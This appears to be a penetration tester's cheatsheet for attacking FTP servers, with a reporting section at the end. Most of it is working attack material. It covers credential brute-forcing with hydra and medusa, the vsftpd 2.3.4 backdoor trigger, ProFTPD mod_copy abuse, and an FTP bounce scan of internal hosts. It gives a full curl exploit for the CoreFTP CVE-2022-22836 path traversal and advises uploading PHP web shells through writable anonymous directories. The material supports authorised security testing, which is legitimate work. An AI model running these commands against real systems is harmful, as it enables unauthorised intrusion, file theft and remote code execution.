🛡️ Methodology Checklist
- Banner grab:
nc [TARGET] 21 - Anonymous login:
ftp [TARGET]→ user: anonymous - List and download files:
ls -la; get [FILE] - Brute-force:
hydra -L users.txt -P pass.txt ftp://[TARGET] - Check for writable directories:
put test.txt - vsftpd 2.3.4 backdoor: connect to port 6200 after triggering
- ProFTPD mod_copy:
SITE CPFR/CPTOto copy files - Check FTP banner for exact version → CVE research
🎯 Operational Context
Use when: FTP (port 21) is exposed — check anonymous access, brute credentials, exploit CVEs (vsftpd backdoor), or abuse writable directories.
Think Dumber First: ftp [TARGET] → username anonymous → password (blank or email). If anonymous works, immediately check for writable dirs (put test.txt). If writable + web accessible = webshell upload path.
Skip when: FTP is internal-only and you have better access vectors.
⚡ Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
sudo nmap -sC -sV -p 21 [TARGET_IP] | FTP version scan + anonymous login check |
nc -vn [TARGET_IP] 21 | Manual banner grab |
ftp [TARGET_IP] → anonymous / blank | Test anonymous login |
ftp> ls -R | Recursive directory listing |
ftp> get [FILE] | Download single file |
ftp> mget * | Download all files |
ftp> put [FILE] | Upload file (if write access) |
ftp> binary | Switch to binary mode (use before downloading any non-text file) |
ftp> prompt | Disable interactive prompt (speeds up mget) |
medusa -u [USER] -P [WORDLIST] -h [TARGET_IP] -M ftp | Brute-force FTP credentials |
medusa -u [USER] -P [WORDLIST] -h [TARGET_IP] -n 2121 -M ftp | Brute-force non-standard port |
nmap -Pn -v -n -p 80 -b anonymous:password@[FTP_IP] [INTERNAL_IP] | FTP bounce attack — scan internal host via FTP proxy |
curl -k -X PUT -H "Host: [TARGET_IP]" --basic -u [USER]:[PASS] --data-binary "PoC." --path-as-is https://[TARGET_IP]/../../../../../../whoops | CVE-2022-22836 CoreFTP directory traversal + arbitrary file write |
🔬 Deep Dive & Workflow
Anonymous Access — Common Misconfiguration
Most valuable FTP finding is anonymous access. Test immediately:
ftp [TARGET_IP]
Username: anonymous
Password: <Enter> or anonymous
Once in:
- Run
ls -Rfor complete inventory - Download config files, backups, keys with
getormget * - If write access exists AND a web server is co-hosted: upload a PHP web shell and trigger via HTTP → RCE
FTP Bounce Attack (Internal Pivot)
The PORT command tells the FTP server where to send data. Abusing it forces the FTP server to scan or connect to internal hosts unreachable from the outside:
# Use FTP server as a proxy to probe internal host port 80
nmap -Pn -v -n -p 80 -b anonymous:password@[FTP_IP] [INTERNAL_IP]Useful when the FTP server is in a DMZ with access to the internal network.
CVE-2022-22836 — CoreFTP HTTP PUT Traversal
CoreFTP Server (pre-build 727) supports HTTP alongside FTP. The HTTP PUT handler fails to sanitize ../ sequences in the path, allowing authenticated write anywhere on the filesystem.
Critical flag: --path-as-is — without it, curl resolves the traversal locally before sending, and the server never sees the attack:
curl -k -X PUT -H "Host: [TARGET_IP]" \
--basic -u [USER]:[PASS] \
--data-binary "PoC." \
--path-as-is https://[TARGET_IP]/../../../../../../whoops
# Verify on target:
# type C:\whoops → PoC.Attack flow: path traversal bypasses folder restriction → CoreFTP writes with its own SYSTEM/Admin privileges → arbitrary file planted (web shell, config override, etc.)
FTP Command Reference
| Command | Purpose |
|---|---|
ls -R | Recursive listing |
cd [dir] | Change directory |
get [file] | Download file |
put [file] | Upload file |
mget * | Download all (use prompt first) |
binary | Binary transfer mode — always set before downloading EXE/ZIP/images |
ascii | ASCII transfer mode (text files) |
prompt | Toggle interactive prompting |
🛠️ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Anonymous FTP login denied | Anonymous disabled | Brute force: hydra -L users.txt -P pass.txt ftp://[TARGET] |
| FTP connects but hangs on LIST | Passive mode needed | Switch to passive: ftp> passive or use curl ftp://[TARGET]/ --user anon: |
| File upload rejected | Write permission denied on current dir | Try changing directory: cd uploads or cd incoming — often writable subdirs exist |
| vsftpd 2.3.4 exploit fails | Backdoor already patched or wrong version | Confirm version: nc [TARGET] 21 → check banner; try manual trigger :) after username |
| Downloaded file corrupt | Binary mode not set | Use binary command in FTP session before transfer; or wget/curl FTP URL directly |
📝 Reporting Trigger
Finding Title: FTP Service Permits Anonymous Access with Writable Directory Impact: Anonymous FTP access with write permissions allows unauthenticated upload of malicious files including web shells when FTP root overlaps with web root, enabling direct remote code execution. Root Cause: FTP server configured with anonymous login enabled and write permissions not restricted. FTP root directory shared with web application. Recommendation: Disable anonymous FTP access. Implement strong authentication for all FTP accounts. Segregate FTP directory from web root. Consider migrating to SFTP (port 22) and disabling FTP entirely.